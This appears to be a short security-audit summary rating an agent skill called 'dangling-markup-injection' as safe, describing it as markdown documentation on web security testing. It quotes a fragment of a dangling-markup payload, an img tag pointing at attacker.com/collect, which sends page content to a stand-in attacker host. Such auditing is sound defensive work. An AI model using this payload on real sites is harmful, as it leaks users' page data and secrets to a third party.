dangling-markup-injection
Pass
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: SAFE
Full Analysis
- [SAFE]: The skill consists entirely of markdown documentation providing instructions on web security testing techniques.
- [SAFE]: No executable scripts, binaries, or configuration files that could affect the host system are present.
- [SAFE]: The payloads described in the text (e.g.,
<img src="https://attacker.com/collect?) are illustrative examples for security research and do not execute within the agent's runtime. - [SAFE]: There is no evidence of prompt injection, data exfiltration from the host, obfuscation, or persistence mechanisms.
Audit Metadata